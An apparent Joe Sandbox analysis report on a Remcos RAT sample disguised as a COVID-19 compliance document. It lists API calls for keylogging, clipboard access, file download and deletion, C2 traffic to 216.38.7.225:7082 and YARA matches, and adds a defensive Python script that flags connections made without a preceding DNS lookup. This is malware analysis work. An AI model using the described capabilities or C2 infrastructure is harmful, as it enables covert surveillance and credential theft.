c_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,DeleteFileA,GetLastError,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_0040728F
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, Code function: 12_2_0040477E _EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QA12_2_0040477E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe, Code function: 12_2_00403325 ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,12_2_00403325
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00412BEE wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_00412BEE
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00403C4A ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV0
1@@Z,?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ,?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$ch12_2_00403C4A
              Source: global traffic | TCP traffic: 192.168.2.5:49738 -> 216.38.7.225:7082
              Source: Joe Sandbox View | IP Address: 162.159.136.232 162.159.136.232
              Source: Joe Sandbox View | IP Address: 162.159.130.233 162.159.130.233
              Source: Joe Sandbox View | IP Address: 162.159.129.233 162.159.129.233
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknown | TCP traffic detected without corresponding DNS query: 216.38.7.225 (listed 22 times)
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_00402149 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,12_2_00402149
              Source: unknown | DNS traffic detected: queries for: discord.com
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://ocsp.comodoca.com0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://ocsp.thawte.com0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Customer Report on COVID-19 Non-Complaince. Doc.exe | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
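The network evidence above shows the two patterns a defender should correlate: HTTPS connections to addresses that a DNS answer explains (the discord.com query and the 162.159.x addresses) next to repeated connections to 216.38.7.225:7082 that no DNS query precedes, which is how a hard-coded C2 address surfaces in telemetry. The following is an added example, not Joe Sandbox code: it implements that correlation in Python over constructed sample telemetry modelled on this report (the discord.com to 162.159.x mapping and all timestamps are assumptions) and additionally reports the spacing between the unexplained connections so a fixed beacon period stands out.

```python
"""Correlate outbound TCP connections with preceding DNS answers.

Added example for this report, not Joe Sandbox code. It replays the idea
behind the "TCP traffic detected without corresponding DNS query"
signature: a destination that no DNS answer produced before the connection
is a candidate hard-coded C2 address. Telemetry below is constructed and
modelled on the report; the discord.com -> 162.159.x mapping and the
timestamps are assumptions.
"""
from dataclasses import dataclass
from ipaddress import ip_address
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class DnsAnswer:
    ts: float      # seconds since capture start
    qname: str
    rdata: str     # answered IPv4/IPv6 address


@dataclass(frozen=True)
class TcpConnect:
    ts: float
    src: str       # "ip:port" of the sandbox host
    dst: str
    dport: int


# Constructed sample telemetry (not the pcap of this analysis).
SAMPLE_DNS = [
    DnsAnswer(10.0, "discord.com", "162.159.136.232"),
    DnsAnswer(10.0, "discord.com", "162.159.130.233"),
    DnsAnswer(10.0, "discord.com", "162.159.129.233"),
]
SAMPLE_TCP = [
    TcpConnect(11.0, "192.168.2.5:49723", "162.159.136.232", 443),
    TcpConnect(11.2, "192.168.2.5:49724", "162.159.130.233", 443),
    TcpConnect(12.0, "192.168.2.5:49738", "216.38.7.225", 7082),
    TcpConnect(42.0, "192.168.2.5:49739", "216.38.7.225", 7082),
    TcpConnect(72.0, "192.168.2.5:49746", "216.38.7.225", 7082),
]


def first_resolution_time(dns: List[DnsAnswer]) -> Dict[str, float]:
    """Map each answered address to the earliest time a DNS answer produced it."""
    first: Dict[str, float] = {}
    for a in dns:
        if a.rdata not in first or a.ts < first[a.rdata]:
            first[a.rdata] = a.ts
    return first


def connections_without_dns(dns: List[DnsAnswer], tcp: List[TcpConnect]) -> List[dict]:
    """Group connections whose destination no earlier DNS answer explains.

    Private, loopback, link-local and multicast destinations are skipped: they
    are reached without DNS legitimately and would only add noise. Each finding
    carries the inter-connection intervals so a fixed beacon period is visible.
    """
    resolved = first_resolution_time(dns)
    findings: Dict[Tuple[str, int], dict] = {}
    for c in sorted(tcp, key=lambda conn: conn.ts):
        addr = ip_address(c.dst)
        if addr.is_private or addr.is_loopback or addr.is_link_local or addr.is_multicast:
            continue
        seen = resolved.get(c.dst)
        if seen is not None and seen <= c.ts:
            continue  # a DNS answer preceded this connection
        key = (c.dst, c.dport)
        f = findings.get(key)
        if f is None:
            findings[key] = {"dst": c.dst, "dport": c.dport, "count": 1,
                             "first_ts": c.ts, "last_ts": c.ts, "intervals": []}
        else:
            f["intervals"].append(c.ts - f["last_ts"])
            f["last_ts"] = c.ts
            f["count"] += 1
    return sorted(findings.values(), key=lambda f: (-f["count"], f["dst"]))


if __name__ == "__main__":
    for f in connections_without_dns(SAMPLE_DNS, SAMPLE_TCP):
        print(f"{f['dst']}:{f['dport']} x{f['count']} intervals={f['intervals']}")
```

On real data the DNS side comes from resolver or Zeek dns.log records and the TCP side from conn.log or firewall events; the only ordering requirement is that answers and connections share a clock, since a destination resolved after the connection is still treated as unexplained.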

              Key, Mouse, Clipboard, Microphone and Screen Capturing:

              Contains functionality to capture and log keystrokes
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Esc] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Enter] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Tab] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Down] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Right] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Up] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Left] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [End] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F2] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [F1] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: [Del] 12_2_00405EB2
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$a
llocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D2A6
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 12_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$a
llocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trai12_2_0040D2A6
              Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 12_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,12_2_0040532D

              E-Banking Fraud:

              Yara detected Remcos RAT
              Source: Yara match | File source: 00000014.00000002.420518923.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.435351745.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.494954469.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000017.00000002.433986384.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000C.00000002.498610658.0000000010540000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000014.00000002.413656142.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 4944, type: MEMORY
              Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 1004, type: MEMORY
              Source: Yara match | File source: Process Memory Space: ieinstal.exe PID: 1496, type: MEMORY
              Source: Yara match | File source: 23.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.ieinstal.exe.10540000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 20.2.ieinstal.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 23.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.ieinstal.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 12.2.ieinstal.exe.10540000.2.unpack, type: UNPACKEDPE
